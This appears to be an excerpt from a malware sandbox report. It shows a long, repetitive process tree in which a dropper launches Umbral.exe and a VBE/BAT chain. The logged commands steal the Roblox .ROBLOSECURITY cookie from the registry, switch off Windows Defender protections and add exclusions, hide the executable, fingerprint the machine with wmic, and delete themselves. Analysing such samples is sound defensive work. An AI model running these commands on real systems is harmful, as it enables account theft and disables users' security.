C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY42⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV143⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY42⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption42⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory42⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid42⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER42⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV143⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name42⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause42⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"42⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"43⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "44⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV145⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"45⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"40⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"41⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"42⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "43⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"44⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"39⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"40⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"41⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "42⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV143⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"43⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"37⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"38⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"39⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"40⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "41⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"42⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"36⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"37⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid38⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV139⤵
-
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"38⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'38⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 238⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY38⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV139⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY38⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV139⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption38⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory38⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV139⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid38⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV139⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER38⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name38⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause38⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost39⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"37⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"38⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"39⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "40⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"41⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"36⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"36⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"37⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"38⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "39⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"40⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"35⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"36⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"37⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "38⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV139⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"39⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"33⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"34⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"34⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"35⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"36⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "37⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"38⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"33⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid34⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"34⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'34⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 234⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY34⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption34⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory34⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid34⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER34⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name34⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause34⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"33⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"34⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"35⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "36⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"37⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"31⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"32⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"32⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"33⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"34⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "35⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"36⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"31⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"31⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"32⤵
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"33⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "34⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"35⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"29⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"30⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"31⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"32⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "33⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"34⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"29⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"29⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"30⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"31⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "32⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"33⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"27⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"28⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"28⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"29⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"30⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "31⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"32⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"27⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"27⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"28⤵
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"29⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "30⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"31⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"25⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"26⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"26⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"27⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"28⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "29⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"30⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"25⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"25⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"26⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"27⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "28⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV129⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"29⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"23⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"24⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"25⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"26⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "27⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"28⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"22⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"23⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"23⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"24⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"25⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "26⤵
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"27⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"21⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"22⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"23⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"24⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "25⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"26⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"21⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid22⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"22⤵
- Views/modifies file attributes
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
